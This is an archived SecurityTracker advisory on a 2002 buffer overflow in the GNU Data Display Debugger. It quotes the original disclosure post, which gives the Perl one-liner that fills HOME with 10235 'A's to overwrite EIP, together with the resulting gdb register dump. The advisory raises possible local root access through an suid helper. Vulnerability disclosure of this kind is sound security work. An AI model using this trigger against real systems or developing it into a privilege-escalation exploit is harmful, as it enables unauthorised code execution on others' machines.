SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Data Display Debugger (DDD) Vendors:   [Multiple Authors/Vendors]
Data Display Debugger (DDD) Programming Utility Buffer Overflow May Let Local Users Obtain Elevated Privileges in Certain Situations When Used With Another Helper Binary
SecurityTracker Alert ID:  1003241
SecurityTracker URL:  http://securitytracker.com/id/1003241
CVE Reference:   CVE-2002-2099   (Links to External Site)
Updated:  May 19 2008
Original Entry Date:  Jan 15 2002
Impact:   Execution of arbitrary code via local system, User access via local system

Version(s): 3.3.1 (i686-pc-linux-gnu)
Description:   A buffer overflow was reported in the Data Display Debugger (DDD) programming utility. A local user can execute arbitrary code and may be able to obtain elevated privileges if the utility is called by a set user id (suid) helper application.

It is reported that a buffer overflow can be triggered by setting the HOME environment variable to a large string, as demonstrated below:

sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

This will result in an error and EIP will be overwritten.

Impact:   A local user can execute arbitrary code on the host. If the utility is called by a helper binary with set user id (suid) or set group id (sgid), a local user could obtain elevated privileges on the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.gnu.org/software/ddd/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat 7.1

Message History:   None.


 Source Message Contents

Subject:  ddd smashed



--=-dyj+eX8s+ST5wAcFSrMP
Content-Type: text/plain
Content-Transfer-Encoding: 8bit            

Werd...
========================================================================
Program  : ddd
OS       : Linux
DISTRO   : RedHat 7.1
Issue    : 0x41414141 (no core tho)
Home Page: http://www.gnu.org/software/ddd/
suid     : No
sgid     : No
Issue    : ddd may be called by an suid helper binary and could be 	  
exploited to gain local root access.

GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
debugger. It provides a graphical data display where complex data
structures can be explored incrementally and interactively.
========================================================================

Normally I use gdb to debug cores but today I decided to try ddd and my
efforts failed.  When I set the $HOME in my test account to 10235 A's
and I tried to run ddd like (I found an evolution core that will be
explained in my next post):


sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

I get a bunch of A's that spew to my console and then some memory access
errors as seen below:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... blah blah...
/.ddd/themes/" failed: File name too long
/tmp/dddNhatCp:3: Error in sourced command file:
Cannot access memory at address 0x41414141
<ctrl-c>

So... in light of this... I decided to use gdb to debug ddd which uses
gdb.. heh...  


Here is a dump of the registers...


eax            0x8572ec4        139931332
ecx            0x0      0
edx            0xbfffbc20       -1073759200
ebx            0x41414141       1094795585
esp            0xbfffbc20       0xbfffbc20
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x120    288
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400bf242       1074524738
foseg          0x2b     43
fooff          0xbfffac86       -1073763194
fop            0x6a     106


smashed ;o)


-- 

-l0rt-
	
	Secure Network Operations
	Strategic Reconnaissance Team
	Team Key ID: ACFCBD01
	l0rt Key ID: 47BF3F87
	------------------------------------------
	"That secret you've been guarding, isn't."


--=-dyj+eX8s+ST5wAcFSrMP
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA8RJDlHs/COEe/P4cRAjzVAJ9JBv6Ajq5rwjP6f6vsR7x7BMHvjACcCv7h
egHncMmDJKyGkdwWihqUNyY=
=hm8q
-----END PGP SIGNATURE-----

--=-dyj+eX8s+ST5wAcFSrMP--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC